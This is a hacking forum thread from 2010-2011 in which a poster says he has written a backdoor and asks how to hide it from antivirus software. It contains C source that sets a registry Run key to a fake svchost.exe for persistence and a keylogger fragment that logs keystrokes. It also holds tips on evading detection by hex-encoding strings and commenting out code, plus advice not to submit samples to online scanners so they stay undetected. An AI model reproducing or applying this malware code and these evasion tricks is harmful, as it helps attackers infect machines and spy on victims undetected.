Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts

Obfuscate Ascii

Started by Foxy999 , Jul 18 2010 05:04 PM

Please log in to reply

2 replies to this topic

#1 Foxy999

Private

Members
9 posts

Posted 18 July 2010 - 05:04 PM

I wrote a backdoor and it is mostly undetected, except for this part of code that sends a few av's off:

int dtcreateregkey() 
{
	HKEY __;
	int _ = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&__);
	char *___ = "C:\\WINDOWS\\svchost.exe";
	if(_ == 0)
	{
		RegSetValueEx((HKEY)__,"svchost",0,REG_SZ,(BYTE *)___,strlen(___));
	}

	return 0;
}

The only reason why it's detected as a virus is because of the codes: "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and "C:\\WINDOWS\\svchost.exe". How to obfuscate to not make it look like normal ascii?

Or does anyone know any good sources of information for writing obfuscated c code? I can't really find any online, just examples.

Foxy

Back to top

#2 Foxy999

Private

Members
9 posts

Posted 18 July 2010 - 06:04 PM

I got it to work, I just changed to ascii to hex. But I am still having trouble obfuscating some of my other functions, if anyone if knowledgeable about this topic I could use some help.

This code is only detected by one av:

if((_ > 64) && (_ < 91))
{
				_ += 32;
				fputc(_,__);
				/*fclose(__);*/
				break;
				}
				/*switch(_)
				{
					case VK_SPACE: 	fputc('\x20', __); fclose(__); break;
					case VK_SHIFT: 	fputs("\x5b\x53\x48\x49\x46\x54\x5d", __); fclose(__); break;
					case VK_RETURN: fputs("\x5b\x45\x4e\x54\x45\x52\x5d", __); fclose(__); break;
					case VK_BACK: 	fputs("\x5b\x42\x41\x43\x4b\x53\x50\x41\x43\x45\x5d", __); fclose(__); break;
					case VK_TAB:	fputs("\x5b\x54\x41\x42\x5d", __); fclose(__); break;
					default:	fclose(__); break;
                	}*/
}

The comments make it undetected. I found that the av (comodo) detects this code a few different ways. First, if the function fputc() is run right before fclose() is ran. Second, is the switch is detected, I am not sure the exact part of the switch I haven't really looked into it because I am first focusing on the first problem. If anyone could shed some insight on a solution I would greatly appreciate it.

I actually don't think it is possible by editing source code, it is detected if the fclose() is executed before the loop ends, and if it's exited outside of the loop the program crashes due to fopen(). So I think the code needs to be re-written, but I would rather have it obfuscated due to possibly setting off other av's with the new code.

Foxyy

Back to top

#3 OpticHash

Private

Members
5 posts

Posted 18 September 2011 - 09:51 PM

Would this be applicable?

http://vxheavens.com/lib/vsp35.html

It's simple but should require more time to decode than most AV's are willing to spend analysing.

BUT I MUST WARN YOU!!!
If you upload any kind of malware to jotti or virusscan I guarantee the same executable will be detected in the following weeks.
DO NOT UPLOAD ANYTHING YOU WISH TO REMAIN UNDETECTED TO THESE KIND OF SITES! So again do not feed them your hard work!

I would suggest to use a tool like the one listed below or just use different computers or VM's with different AV's to scan your file.
http://multiscan-project.blogspot.com/

Thoughts?